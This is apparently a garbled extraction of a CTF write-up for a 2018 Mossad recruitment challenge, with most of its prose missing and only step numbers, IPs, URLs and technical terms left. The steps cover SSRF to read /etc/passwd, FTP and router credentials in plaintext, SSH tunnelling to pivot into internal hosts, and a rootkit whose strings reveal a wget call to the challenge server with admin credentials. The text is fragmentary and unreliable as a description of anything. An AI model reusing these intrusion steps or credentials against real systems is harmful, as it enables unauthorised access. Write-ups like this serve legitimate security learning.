2018
2 31
2018
https://www.google.co.il/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&uact=8&ved=2ahUKEwiY0t2N8M_aAhUIuhQKHUYYADYQjRx6BAgAEAU&url=https%3A%2F%2Fwww.breakingisraelnews.com%2F67634%2Fcrack-code-join-mossad%2F&psig=AOvVaw3x9-OQ3YCfcpWl0sk9BfGw&ust=1524554997563347
IP ............................................................ 4 | News Blog ...................................................................................................................... 6
1. ...................................................................................................... 6
2. ........................................................................................................... 6
3. ..................................................................................................... 6
PCAP................................................... 13
1. ................................................................................................... 13
2. ........................................................................................................ 13
3. .................................................................................................. 13
| rootkit ........................................................................................................................... 23 1. ................................................................................................... 23
2. ........................................................................................................ 23
3. .................................................................................................. 23
2018
| IP 1. 18.4.2018 20:00 - 0
https://www.r-u-ready.xyz/
2. Brainfuck .
2.1.
https://www.r-u-ready.xyz/https://www.r-u-ready.xyz/https://www.r-u-ready.xyz/
2.2. - xor-with-key. 3. XOR HEX Brainfuck 2.1
.
4. Israel-Is-70
String - HEX XOR .
5. IP 35.205.32.11
| News Blog http://35.205.32.11/
1. phishing.
2. 2.1. .
3. 3.1.
http://35.205.32.11/main
http://35.205.32.11/http://35.205.32.11/http://35.205.32.11/http://35.205.32.11/main
3.2. source code
3.3.
http://35.205.32.11/administration
3.4. ,
:
http://35.205.32.11/register
http://35.205.32.11/administrationhttp://35.205.32.11/register
3.5. SSRF.
3.5.1. client ,
web console - :
3.6. /etc/passwd
3.6.1.
3.7. login.php :
3.7.1.
3.7.2. login.php.
3.7.3.
3.8. loopback )127.0.0.1
3.8.1. console :
3.8.2.
2018
12 31
3.9. console :
3.9.1.
http://35.205.32.11/profilePics/administration
3.10. IP anonymous :
http://35.205.32.11/ch1_success
http://35.205.32.11/profilePics/administrationhttp://35.205.32.11/ch1_success
| PCAP
1. phishing
2. 2.1. PCAP
2.2. FTP
2.3.
2.4. storage
3. 3.1. wireshark FTP
35.204.90.89 2121
3.1.1. username : user , password: 12345
3.2. FTP
3.3. pcap FTP
5555 – HASH :
strings :
3.3.1. hash md5 - 37478
3.3.2. 37479 hash sha512 :
3.3.3. 5555:
3.3.4. hash 19922
3.4. FTP 5555 hash
1 hash sha512.
3.4.1. script
3.4.2. script FTP
3.5. FTP 2121 PCAP
3.5.1. Linux
FileZila
3.6. FTP 4
3.6.1. /usr/backup
Id_rsa Hint latest FW - floppyfw.conf.enc
3.6.2. backup cisco - cisco.conf.enc
3.7. hint s3cr3t - RSA
3.8. RSA SSH
shell /bin/false :
3.8.1. SFTP –
3.8.2. conf_enc.pyc -
FTP
2018
18 31
3.9. decompile pyc
3.9.1. :
3.10. script
3.10.1. google
https://gist.github.com/swinton/8409454
https://gist.github.com/swinton/8409454
3.10.2. Decrypt
3.11. FTP
3.11.1. cisco.conf - cisco
3.11.1.1. fwadmin
3.11.1.2. username : fwadmin password:
Sup3rS3cr#tP@ssword
3.11.1.3. router access-list
3.11.1.4. router
10.128.0.3 3389 8080
10.164.0.3 22
3.11.2. floppyfw.conf
3.11.2.1. FW 10.164.0.3 router
SSH (
3.11.2.2. FW
3.11.3.
3.11.3.1. storage 10.128.0.3
3.11.3.2. FW
10.164.0.3
3.11.3.3. storage 3389 8080
2018
21 31
3.12. 10.164.0.3
ssh tunneling FTP ssh tunnel FW tunnel
10.128.0.3 8080 .
3.12.1. backup SSH
3.12.2.
3.12.3. FW
3.12.4. router - Sup3rS3cr#tP@ssword
3.12.5. 8888
3.13. storage
http://35.205.32.11/ch1_success
2018
22 31
3.13.1. stolen_files/ mossad_2018_challenge.solution.doc
3.13.2.
http://localhost:8888/
2018
23 31
| rootkit
1.
2. 2.1.
2.2. ISO
2.3. JS
3. 3.1. zip busybox
3.2. file
3.2.1. ELF 64-
3.2.2. VM
2018
24 31
3.3. /tmp/
3.3.1. tmp
3.3.2. ls busybox
3.3.3.
3.3.3.1.
3.4. tmp
3.4.1. .readme tmp
3.5. suspicious network activity detected 3.5.1. .readme busybox
3.6. ps Process
2018
25 31
3.6.1. PID 1337 tmp/Tr0j linux
process
3.6.1.1. admin
3.6.2. /proc/1337 proc oply(
3.6.2.1. busybox
3.6.3. strings
3.6.3.1. wget
http://35.205.32.11/iso?user=admin&pass=Uw1lLN3v3rG3tM3
http://35.205.32.11/iso?user=admin&pass=Uw1lLN3v3rG3tM3
2018
26 31
3.6.3.2. ZIP ISO
3.7. mount
2018
27 31
3.7.1. ISO
)thumbs.db (vault
3.7.1.1.
3.7.2. file vault sqlight
3.7.3. 4 HTML 3 JS
3.7.3.1. Blowfish-CBC .
3.7.4. JS key
ISO thumb.db
3.7.4.1. thumb.db
3.7.4.2. KEY - *israel70*
3.8. http://sladex.org/blowfish.js/ decrypt 3 JS .
3.8.1. key.js
3.8.2. aes.js
http://sladex.org/blowfish.js/http://sladex.org/blowfish.js/http://sladex.org/blowfish.js/
3.8.3. script.js unpack (
3.8.4. HTML
3.9. 3 127.0.0.1( 1337
key 2
3.10. web python.
3.11. HTML
3.12. key - JSONdebug js
3.12.1. base64 decode –
!
3.13.
3.14.
http://35.205.32.11/ch3_finish/mZ3JyMmakpidmJ6az5+SzM+ZzJ3MzJ2cyJzOk5mSnp4
http://35.205.32.11/ch3_finish/mZ3JyMmakpidmJ6az5+SzM+ZzJ3MzJ2cyJzOk5mSnp4